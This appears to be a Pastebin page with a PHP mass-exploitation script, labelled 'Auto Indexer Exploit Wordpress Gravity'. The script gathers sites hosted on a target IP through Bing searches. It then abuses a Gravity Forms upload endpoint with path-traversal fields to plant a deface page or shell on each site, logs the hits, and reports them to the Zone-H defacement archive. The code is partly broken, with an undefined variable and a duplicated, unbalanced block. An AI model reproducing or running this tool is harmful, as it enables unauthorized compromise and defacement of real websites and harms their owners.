Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- echo "
- _____ ___ ____ _ _
- __ _ _ __ ___ _ _ _ __ |___ / / _ \| ___| ___ _ _ _ __ ___| |__ | | __
- / _` | '__/ _ \| | | | '_ \ _____ |_ \| | | |___ \ / __| | | | '_ \ / _ \ '_ \| |/ /
- | (_| | | | (_) | |_| | |_) |_____|__) | |_| |___) | \__ \ |_| | | | | __/ | | | <
- \__, |_| \___/ \__,_| .__/ |____/ \___/|____/ |___/\__,_|_| |_|\___|_| |_|_|\_\
- |___/ |_|
- Auto Indexer Exploit Wordpress Gravity
- echo "\n\n";
- echo "Enter IP Or Site >>> ";
- $site=trim(fgets(STDIN,1024));
- echo "your index or Shell >>> ";
- $index=trim(fgets(STDIN,1024));
- $ip=gethostbyname("$site");
- echo "Name Of Your Zone >>> ";
- $hacker=trim(fgets(STDIN,1024));
- {
- $sites = array_map("site", bing("ip:$ip"));
- $un=array_unique($sites);
- echo "[+] Scanning -> ", $ip, " Wait... ";
- echo "Found : ".count($sites)." sites\n\n";
- foreach($un as $web){
- $site="http://$web/";
- $zone= "http://zone-h.org/notify/single";
- $path= "?gf_page=upload";
- $hacked="$site/_input__.html";
- $hackmode="1";
- $reson="1";
- $psyco = curl_init("$site/$path");
- curl_setopt($psyco, CURLOPT_POST, true);
- curl_setopt($psyco, CURLOPT_POSTFIELDS, array( 'file'=>"@$index", 'name'=>'.html','form_id'=>'../../../','gform_unique_id'=>'../../'));
- curl_setopt($psyco, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($psyco, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($psyco, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36");
- $result = curl_exec($psyco);
- curl_close($psyco);
- if (strstr($result, "\"ok\""))
- {
- echo "Ok :D -> ". $site ." Found : "."\n";
- echo "Your Shell Or Index >>> $site/_input__.html"."\n\n";
- $save = fopen("bot.txt","a+"."\r\n");
- fwrite($save,"$site/_input__.html "."\r\n");
- echo "Miroir Of Zone-h Or Al Joyouch";
- $k = curl_init();
- curl_setopt($k, CURLOPT_URL, $zone);
- curl_setopt($k,CURLOPT_POST,1);
- curl_setopt($k,CURLOPT_POSTFIELDS,"defacer="."$hacker"."&domain1=".$hacked."&hackmode=".$hackmode."&reason=".$reson);
- curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
- $kubra = curl_exec($k);
- curl_close($k);
- if (eregi('OK', $kubra)) {
- echo "| Send Site To Zone-H\n";
- echo "| Site : ".$site." Ok ./done !";
- } else {
- echo "| Send Site To Zone-H\n";
- echo "| ".$site . " : Domain has been defaced during last year \n\n";
- }
- $a = curl_init();
- curl_setopt($a, CURLOPT_URL, $zone1);
- curl_setopt($a,CURLOPT_POST,1);
- curl_setopt($a, CURLOPT_POSTFIELDS,"hacker="."$hacker"."&site=".$hacked."&how=".$hackmode."&why=".$reson."&zo=zon&addsite=Send");
- curl_setopt($a,CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($a, CURLOPT_RETURNTRANSFER, true);
- $kub = curl_exec($a);
- curl_close($a);
- echo "| Site : ".$site." Ok ./done !";
- } else {
- echo "| Send Site To Zone-H\n";
- echo "| ".$site . " : Domain has been defaced during last year \n\n";
- }
- $a = curl_init();
- curl_setopt($a, CURLOPT_URL, $zone1);
- curl_setopt($a,CURLOPT_POST,1);
- curl_setopt($a, CURLOPT_POSTFIELDS,"hacker="."$hacker"."&site=".$hacked."&how=".$hackmode."&why=".$reson."&alj=aljyyosh&addsite=Send");
- curl_setopt($a,CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($a, CURLOPT_RETURNTRANSFER, true);
- $kub = curl_exec($a);
- curl_close($a);
- if (eregi('OK', $kub)) {
- echo "\n\n"."| Send Site To wis\n";
- echo "| Site : ".$site." ./done ! "."\n\n";
- } else {
- echo "| Send Site To wis\n";
- echo "| ".$site . " : Domain has been defaced during last year "."\n\n";
- }
- }else
- echo "$site No "."\n\n";
- }
- }
- function findit($mytext,$starttag,$endtag) {
- $posLeft = stripos($mytext,$starttag)+strlen($starttag);
- $posRight = stripos($mytext,$endtag,$posLeft+1);
- return substr($mytext,$posLeft,$posRight-$posLeft);
- }
- function site($link){
- return str_replace("","",parse_url($link, PHP_URL_HOST));
- }
- function bing($what){
- for($i = 1; $i <= 2000; $i += 10){
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
- curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
- curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- $data = curl_exec($ch);
- preg_match_all('#;a=(.*?)" h="#',$data, $links);
- foreach($links[1] as $link){
- $allLinks[] = $link;
- }
- if(!preg_match('#"sw_next"#',$data)) break;
- }
- if(!empty($allLinks) && is_array($allLinks)){
- return array_unique(array_map("urldecode", $allLinks));
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement